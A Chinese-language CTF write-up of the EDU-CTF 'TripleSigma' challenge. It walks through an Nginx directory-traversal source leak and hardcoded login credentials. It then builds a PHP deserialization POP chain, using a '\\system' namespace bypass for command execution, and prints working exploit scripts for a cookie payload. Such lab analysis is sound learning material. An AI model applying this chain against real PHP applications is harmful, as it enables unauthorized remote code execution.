EDU-CTF TripleSigma题解

安恒网络空间安全讲武堂

发布于 2019-09-29 14:09:48

8130

发布于 2019-09-29 14:09:48

EDU-CTF是台大、交大、台科大三个学校的校赛，题目感觉都不错。TripleSigma这道题的反序列化POP链很有意思，官方wp写的很简单，在这里分析一下。题目地址：http://final.kaibro.tw:10004/(需要梯zi)

信息搜集

打开是一个博客页面，注册功能被关掉了，目录也扫不出来东西。根据报错页面可以知道后端是Nginx

众所周知Nginx会由于配置错误产生很多安全问题，可以参考p牛文章：三个案例看Nginx配置安全比如这里就存在目录穿越漏洞，从而可以下载网站源码。

代码审计

网站的源码文件很多， lib文件夹下是各种功能的模块文件。根目录下的每个文件都包含了所有模块。首先查看注册和登陆源码，注册代码基本没用。 login.php

<?php
    session_start();
    if(isset($_POST['user']) && isset($_POST['pass'])) {
        $user = $_POST['user'];
        $pass = $_POST['pass'];
        if(User::check($user, $pass)) {
            $_SESSION['user'] = User::getIDByName($user);
        $wrong = false;
            header("Location: index.php");
        } else {
            $wrong = true;
        }
    }
?>

跟进 User模块 class_user.php

<?php

class User {

    public $func = "shell_exec";
    public $data = NULL;
    public static function getAllUser() {
        $users = array(array('id' => 1, 'name' => 'kaibro', 'password' => 'easypeasy666'));
        return $users;
    }

    public static function getNameByID($id) {
        $users = User::getAllUser();
        for($i = 0; $i < count($users); $i++) {
            if($users[$i]['id'] === $id) {
                return $users[$i]['name'];
            }
        }
        return NULL;
    }

    public static function getIDByName($name) {
        $users = User::getAllUser();
        for($i = 0; $i < count($users); $i++) {
            if($users[$i]['name'] === $name) {
                return $users[$i]['id'];
            }
        }
        return NULL;
    }

    public static function check($name, $password) {
        $users = User::getAllUser();
        for($i = 0; $i < count($users); $i++) {
            if($users[$i]['name'] === $name && $users[$i]['password'] === $password)
                return true;
        }
        return false;
    }

    public function save() {
        if(!isset($this->data))
            $this->data = User::getAllUser();

        if(preg_match("/^[a-z]/is", $this->func)) {
            if($this->func === "shell_exec") {
            #    ($this->func)("echo " . escapeshellarg($this->data) . " > /tmp/result");
            }
        } else {
       #     ($this->func)($this->data);
        }

    }

    public static function getFunc() {
        return $this->func;
    }

}

可以看到 check方法把登陆的用户名密码与 getAllUser方法的数组进行对比，有相同的值就返回True。因此我们直接用源码中的 kaibro和 easypeasy666登陆即可。另外在 cookie模块中发现一处任意反序列化

寻找POP Chain

在 blog.php中如果存在 $_COOKIE['e']，则会实例化cookie对象，并且可以触发任意反序列化对象的 __tostring方法

user模块的 save方法虽然对 shell_exec的参数进行了 escapeshellarg处理，且要求自定义函数名开头不能为字母，但是我们可以通过php全局命名空间 \进行绕过，

进入 else条件中进行RCE。

public function save() {
        if(!isset($this->data))
            $this->data = User::getAllUser();

        if(preg_match("/^[a-z]/is", $this->func)) {
            if($this->func === "shell_exec") {
                ($this->func)("echo " . escapeshellarg($this->data) . " > /tmp/result");
            }
        } else {
            ($this->func)($this->data);
        }

构造exp（这里我在本地测试了，因为发现题目有问题。）

<?php
include("lib/class_cookie.php");
include("lib/class_user.php");
include("lib/class_debug.php");

$A = new Debug();
$A->fm = new User();
$A->fm->func = "\\system";
$A->fm->data = "dir";

echo strrev(base64_encode("1|".serialize($art)));

测试失败，而官方给的exp却可以

<?php
include("lib/class_article.php");
include("lib/class_articlebody.php");
include("lib/class_cookie.php");
include("lib/class_user.php");
include("lib/class_debug.php");
include("lib/class_filemanager.php");


$title = new Debug();
$title->fm = new User();
$title->fm->func = "\\system";
$title->fm->data = "dir";
$content = "foo";
$body = new ArticleBody($title, $content);
$art = new Article("foo", "bar");
$art->body = $body;

echo strrev(base64_encode("1|".serialize($title)));

它这里把 Debug类的序列化对象传给了 ArticleBody的 $title属性，然后 ArticleBody类的序列化对象又传给了 Article对象的 $body属性。跟第一次测试的思路一样，触发 Article对象的 __tostring方法

从而又触发了 ArticleBody对象的 __tostring方法

而它的 $title属性为 Debug，从而又触发其 __tostring方法调用我们传入的 User对象的 save()方法构成RCE。

寻找测试失败原因

想了很久才发现是printtitle()函数的问题。

一直以为他会直接打印字符串，从而触发 __tostring。哪里会想到它echo的是 $r->body->title 在libcommon.php第99行。

function print_title($r) {
    if(isset($r)) {
        echo $r->body->title;
    }
}

那么官方的exp就是直接触发 Debug的 __toString方法了，没有那么复杂了，2333感觉好坑啊。

后记

以后读代码一定要仔细认真，不忽略任何一个点，不然要绕大弯路。

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2019-01-18，如有侵权请联系 cloudcommunity@tencent.com 删除

文件存储

本文分享自恒星EDU 微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

登录后参与评论

0 条评论

热度